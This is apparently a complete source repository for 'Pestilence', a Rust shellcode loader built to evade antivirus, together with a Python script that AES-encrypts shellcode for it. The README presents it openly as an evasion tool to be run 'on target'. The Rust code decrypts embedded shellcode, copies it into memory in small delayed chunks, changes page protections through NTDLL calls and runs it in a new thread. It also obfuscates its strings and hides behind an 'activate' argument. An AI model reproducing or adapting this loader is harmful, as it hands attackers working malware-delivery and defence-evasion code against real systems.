├── .gitignore ├── Cargo.toml ├── LICENSE ├── encrypt_shellcode.py ├── README.md └── src └── main.rs /.gitignore: -------------------------------------------------------------------------------- 1 | /target 2 | aes.iv 3 | aes.key 4 | Cargo.lock 5 | shellcode.bin 6 | shellcode.enc 7 | /.idea -------------------------------------------------------------------------------- /Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "pestilence" 3 | version = "0.1.0" 4 | edition = "2021" 5 | 6 | [dependencies] 7 | ntapi = "0.4.0" 8 | aes = "0.7.5" 9 | cfb-mode = "0.7.1" 10 | obfstr = "0.3.0" 11 | 12 | [dependencies.windows] 13 | version = "0.23.0" 14 | features = [ 15 | "Win32_System_Memory", 16 | "Win32_System_Services", 17 | "Win32_System_SystemServices", 18 | "Win32_Foundation", 19 | ] 20 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Daniil Nababkin 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /encrypt_shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import os 3 | import string 4 | import random 5 | from hashlib import md5 6 | from Cryptodome.Cipher import AES 7 | 8 | letters = string.ascii_letters 9 | print("[+] ALPHABET:", letters) 10 | 11 | random_key = ''.join(random.choice(letters) for _ in range(32)) 12 | random_iv = ''.join(random.choice(letters) for _ in range(16)) 13 | print("[+] KEY:", random_key) 14 | print("[+] IV:", random_iv) 15 | 16 | random_key_digest = md5(random_key.encode('utf-8')) 17 | random_iv_digest = md5(random_iv.encode('utf-8')) 18 | print("[+] KEY DIGEST (md5):", random_key_digest.hexdigest()) 19 | print("[+] IV DIGEST (md5):", random_iv_digest.hexdigest()) 20 | random_key_digest = random_key_digest.digest() 21 | random_iv_digest = random_iv_digest.digest() 22 | 23 | with open("aes.key", "wb") as f: 24 | f.write(random_key_digest) 25 | 26 | with open("aes.iv", "wb") as f: 27 | f.write(random_iv_digest) 28 | 29 | mode = AES.MODE_CFB 30 | encryptor = AES.new(random_key_digest, mode, random_iv_digest, segment_size=128) 31 | 32 | with open("shellcode.bin", "rb") as f: 33 | shellcode = f.read() 34 | 35 | cipher = encryptor.encrypt(shellcode) 36 | 37 | with open("shellcode.enc", "wb") as f: 38 | f.write(cipher) 39 | 40 | print("[+] DONE!") 41 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pestilence 2 | ### What is pestilence? 3 | Pestilence is a shellcode loader designed for evasion. Coded in Rust. 4 | ### How does it work? 5 | It loads AES-128-CFB encrypted shellcode (including the key and IV) into the .text PE section during the build stage. 6 | During the execution, it first checks for "activated" cmdline argument. If present, it decrypts the shellcode stub, copies it gradually (mixed with custom sleeps) and proceeds to execute it in memory by using NTDLL.DLL functions (mixed with custom sleeps). 7 | # Installation 8 | ### Requirements 9 | * python3 (tested with 3.10) + pycryptodomex 10 | * rust (nightly-x86_64-pc-windows-msvc toolchain) 11 | * visual studio 2019 build tools 12 | ### How to install them 13 | #### vs2019 build tools 14 | Download and install vs2019 build tools from here: 15 | ``` 16 | https://visualstudio.microsoft.com/downloads/#build-tools-for-visual-studio-2019 17 | ``` 18 | Make sure that you select "Desktop development with C++" option. 19 | #### python3 + pycryptodome 20 | Download and install python using this link (do not forget to add it to PATH): 21 | ``` 22 | https://www.python.org/ftp/python/3.10.0/python-3.10.0-amd64.exe 23 | ``` 24 | Install pycryptodomex: 25 | ```shell 26 | pip3 install pycryptodomex 27 | ``` 28 | #### rust 29 | Install rust using rustup from this link: 30 | ``` 31 | https://static.rust-lang.org/rustup/dist/x86_64-pc-windows-msvc/rustup-init.exe 32 | ``` 33 | * Install the C++ build tools if asked. 34 | * Be sure to choose "customize installation". 35 | 36 | Modify install settings: 37 | ``` 38 | Default host triple? [x86_64-pc-windows-msvc] 39 | Default toolchain? [nightly] 40 | Profile? [default] 41 | Modify PATH variable? [Y] 42 | ``` 43 | Proceed with installation. 44 | # Build & Usage 45 | ### Build 46 | Open powershell and thrive: 47 | ```shell 48 | git clone https://github.com/cr7pt0pl4gu3/Pestilence 49 | cd Pestilence 50 | cp /path/to/raw/shellcode.bin shellcode.bin 51 | python encrypt_shellcode.py 52 | cargo build --release 53 | ``` 54 | Note: shellcode must be named "shellcode.bin"! 55 | ### Usage 56 | On target, execute: 57 | ```shell 58 | pestilence.exe activate 59 | ``` 60 | Done! 61 | #### Good luck! I hope that pestilence helped you. 62 | -------------------------------------------------------------------------------- /src/main.rs: -------------------------------------------------------------------------------- 1 | use std::env; 2 | use aes::{Aes128}; 3 | use cfb_mode::Cfb; 4 | use cfb_mode::cipher::{NewCipher, AsyncStreamCipher}; 5 | use windows::{Win32::System::Memory::*, Win32::System::SystemServices::*}; 6 | use ntapi::{ntmmapi::*, ntpsapi::*, ntobapi::*, winapi::ctypes::*}; 7 | use obfstr::obfstr; 8 | 9 | type Aes128Cfb = Cfb; 10 | 11 | pub struct Injector { 12 | shellcode: Vec, 13 | } 14 | 15 | impl Injector { 16 | pub fn new(shellcode: Vec) -> Injector { 17 | Injector { shellcode } 18 | } 19 | 20 | pub fn run_in_current_process(&mut self) { 21 | unsafe { 22 | let mut protect = PAGE_NOACCESS.0; 23 | let mut map_ptr: *mut c_void = std::ptr::null_mut(); 24 | // asking for more than needed, because we can afford it 25 | let mut sc_len = self.shellcode.len() * 5; 26 | NtAllocateVirtualMemory(NtCurrentProcess, &mut map_ptr, 0, &mut sc_len, MEM_COMMIT.0 | MEM_RESERVE.0, protect); 27 | custom_sleep(100); 28 | NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_READWRITE.0, &mut protect); 29 | custom_sleep(100); 30 | self.copy_nonoverlapping_gradually(map_ptr as *mut u8); 31 | NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_NOACCESS.0, &mut protect); 32 | custom_sleep(100); 33 | NtProtectVirtualMemory(NtCurrentProcess, &mut map_ptr, &mut sc_len, PAGE_EXECUTE.0, &mut protect); 34 | custom_sleep(100); 35 | let mut thread_handle : *mut c_void = std::ptr::null_mut(); 36 | NtCreateThreadEx(&mut thread_handle, MAXIMUM_ALLOWED, std::ptr::null_mut(), NtCurrentProcess, map_ptr, std::ptr::null_mut(), 0, 0, 0, 0, std::ptr::null_mut()); 37 | NtWaitForSingleObject(thread_handle, 0, std::ptr::null_mut()); 38 | } 39 | } 40 | 41 | fn copy_nonoverlapping_gradually(&mut self, map_ptr: *mut u8) { 42 | unsafe { 43 | let sc_ptr = self.shellcode.as_ptr(); 44 | let mut i = 0; 45 | while i < self.shellcode.len()+33 { 46 | std::ptr::copy_nonoverlapping(sc_ptr.offset(i as isize), map_ptr.offset(i as isize), 32); 47 | i += 32; 48 | #[cfg(debug_assertions)] 49 | if i % 3200 == 0 || i > self.shellcode.len() 50 | { 51 | println!("{}{}{}{}{}", obfstr!("[+] [total written] ["), i, obfstr!("B/"), self.shellcode.len(), obfstr!("B]")); 52 | } 53 | custom_sleep(2); 54 | } 55 | } 56 | } 57 | } 58 | 59 | const SHELLCODE_BYTES: &[u8] = include_bytes!("../shellcode.enc"); 60 | const SHELLCODE_LENGTH: usize = SHELLCODE_BYTES.len(); 61 | 62 | #[no_mangle] 63 | #[link_section = ".text"] 64 | static SHELLCODE: [u8; SHELLCODE_LENGTH] = *include_bytes!("../shellcode.enc"); 65 | static AES_KEY: [u8; 16] = *include_bytes!("../aes.key"); 66 | static AES_IV: [u8; 16] = *include_bytes!("../aes.iv"); 67 | 68 | fn decrypt_shellcode_stub() -> Vec { 69 | let mut cipher = Aes128Cfb::new_from_slices(&AES_KEY, &AES_IV).unwrap(); 70 | let mut buf = SHELLCODE.to_vec(); 71 | cipher.decrypt(&mut buf); 72 | buf 73 | } 74 | 75 | fn custom_sleep(delay: u8) { 76 | for _ in 0..delay { 77 | for _ in 0..10 { 78 | for _ in 0..10 { 79 | for _ in 0..10 { 80 | print!("{}", obfstr!("")); 81 | } 82 | } 83 | } 84 | } 85 | } 86 | 87 | fn main() { 88 | let args: Vec = env::args().collect(); 89 | if args[1] == obfstr!("activate") { 90 | let mut injector = Injector::new(decrypt_shellcode_stub()); 91 | injector.run_in_current_process(); 92 | } 93 | } 94 | --------------------------------------------------------------------------------